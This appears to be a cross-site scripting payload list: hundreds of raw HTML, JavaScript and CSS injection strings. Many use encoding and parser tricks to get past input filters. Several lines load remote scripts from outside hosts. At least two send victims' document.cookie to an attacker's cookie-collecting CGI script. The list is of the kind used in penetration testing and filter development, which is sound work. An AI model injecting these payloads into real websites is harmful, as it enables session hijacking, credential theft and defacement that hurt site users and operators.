&#00;</form><input type&#61;"date" onfocus="alert(1)">
&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
¼script¾alert(¢XSS¢)¼/script¾
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00
&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
"<A HREF=""//blog.zsec.uk/"">XSS</A>"
<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
"<A HREF=""//google"">XSS</A>"
"<A HREF=""h\ntt\tp://6"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
"<A HREF=""http://1113982867/"">XSS</A>"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
"<A HREF=""http://blog.zsec.uk./"">XSS</A>"
"<A HREF=""http://blog.zsec.uk/"">XSS</A>"
"<A HREF=""http://www.gohttp://blog.zsec.uk/ogle.com/"">XSS</A>"
<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
"<A HREF=""javascript:document.location='http://blog.zsec.uk/'"">XSS</A>"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
"\"";alert('XSS');//"
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
ascript:alert('WXSS');"">"
"ascript:alert('XSS');"">"
"<BASE HREF=""javascript:alert('XSS');//"">"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
<BODY ONLOAD=alert('XSS')>
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
<body/onload=&lt;!--&gt;&#10alert(1)>
"<BR SIZE=""&{alert('XSS')}"">"
"<![CDATA[<!--]]><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
<div/onmouseover='alert(1)'> style="x:">
<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
"<div style=""behaviour: url([link to code]);"">"
"<div style=""binding: url([link to code]);"">"
"<div style=""binding: url([link to code]);""> [Mozilla]"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
<div/style="width:expression(confirm(1))">X</div> {IE7}
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
<div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
"&{document.write(""XSS-XSS-XSS"");};"
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=https://zero.xss.ht></SCRIPT>'""-->"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
<form><button formaction=javascript&colon;alert(1)>CLICKME
<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
<form><isindex formaction="javascript&colon;confirm(1)"
<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
http://www.google<script .com>alert(document.location)</script
http://www.<script>alert(1)</script .com
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<iframe/%00/ src=javaSCRIPT&colon;alert(1)
<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00>
<iframe/onreadystatechange=alert(1)
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
<iframe src=http://ha.ckers.org/scriptlet.html <
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<iframe/src \/\/onload = prompt(1)
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
"<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
"<IMG%20SRC=""jav
"<IMG%20SRC=""jav"
<IMG%20SRC='javasc
<IMG%20SRC='javascript:alert(document.cookie)'>
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
"<IMG%20SRC=""jav	ascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS')"""
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
<IMG%20SRC=javascript:alert("WXSS")>
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=javascript:alert('XSS')>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"<IMG DYNSRC=""javascript:alert('XSS')"">"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<img src=`%00`&NewLine; onerror=alert(1)&NewLine;
<img/src=`%00` onerror=this.onerror=confirm(1)
"<IMG SRC="" &#14;  javascript:alert('XSS');"">"
<img/src=@&#32;&#13; onerror = prompt('&#49;')
"<img src=a onerror=alert('1')>
<img src=a onerror=alert('1')>
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
<img src ?itworksonchrome?\/onerror = alert(1)
"<IMG SRC=""jav"
"<img src="javascript:alert('1');>
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
"<IMG SRC=""javascript:alert('XSS')"""
"<IMG SRC=""javascript:alert('XSS');"">"
"<IMG SRC=javascript:alert(""XSS"")>"
<IMG SRC=JaVaScRiPt:alert('XSS')>
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
<--`<img/src=` onerror=alert(1)> --!>
">"><IMG SRC=""onerror="alert('XSS')"">
">"><IMG SRC=""onerror="alert('XSS')"a=".jpg">
<img src="/" =_=" title="onerror='prompt(1)'">
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"><img src=x onerror=window.open('https://blog.zsec.uk/');>
<img src=`xx:xx`onerror=alert(1)>
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
<input value=<><iframe/src=javascript:confirm(1)
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
&ltscript&gtalert(document.cookie);&ltscript&gtalert
&ltscript&gtalert(document.cookie);</script>
<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
<math><a xlink:href="//jsfiddle.net/t846h/">click
<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
</plaintext\></|\><plaintext/onmouseover=prompt(1)
><script>
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<script>+-+-1-+-+alert(1)</script>
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
<script ~~~>alert(0%0)</script ~~~>
">"><script>alert(1)</script>
<%<!--'%><script>alert(1);</script -->
'><script>alert(document.cookie);</script>
'><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script ^__^>alert(String.fromCharCode(49))</script ^__^
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
"<<script>alert(""WXSS"");//<</script>"
"<script>alert(""WXSS"")</script>"
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
"<SCRIPT ""a='>'"" SRC=""https://zero.xss.ht""></SCRIPT>"
"<SCRIPT a="">"" '' SRC=""https://zero.xss.ht""></SCRIPT>"
"<SCRIPT a="">"" SRC=""https://zero.xss.ht""></SCRIPT>"
"<SCRIPT a="">'>"" SRC=""https://zero.xss.ht""></SCRIPT>"
"<SCRIPT a=`>` SRC=""https://zero.xss.ht""></SCRIPT>"
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""https://zero.xss.ht""></SCRIPT>"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
"<!-- -- --><script>document.write(""XSS-XSS-XSS"");</script><!-- -- -->"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'>
<script itworksinallbrowsers>/*<script* */alert(1)</script
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
<script src="data:text/javascript,alert(1)"></script>
<SCRIPT SRC=//ha.ckers.org/.j>
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
<SCRIPT SRC=https://zero.xss.ht?<B>
"<SCRIPT ="">"" SRC=""https://zero.xss.ht""></SCRIPT>"
"<SCRIPT/SRC=""https://zero.xss.ht""></SCRIPT>"
<script/&Tab; src='http://0r.pe' /&Tab;></script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script x> alert(1) </script 1=2
"<SCRIPT/XSS SRC=""https://zero.xss.ht""></SCRIPT>"
</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
"<style><!--</style><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
<svg contentScriptType=text/vbs><script>MsgBox+1
<svg/onload=alert(1)
<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}
<svg><script ?>alert(1)
<svg><script>//&NewLine;confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<svg><script xlink:href=data&colon;,window.open('https://blog.zsec.uk/')></script
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
<var onmouseover="prompt(1)">On Mouse Over</var>
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
'';!--"<XSS>=&{()}
'';!--<XSS>=&{()}"
<xss><script>alert('WXSS')</script></vulnerable>
"<XSS STYLE=""behavior: url(xss.htc);"">"
<~/XSS/*-*/Style=xss:e/**/xpression(alert('XSS'))>
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
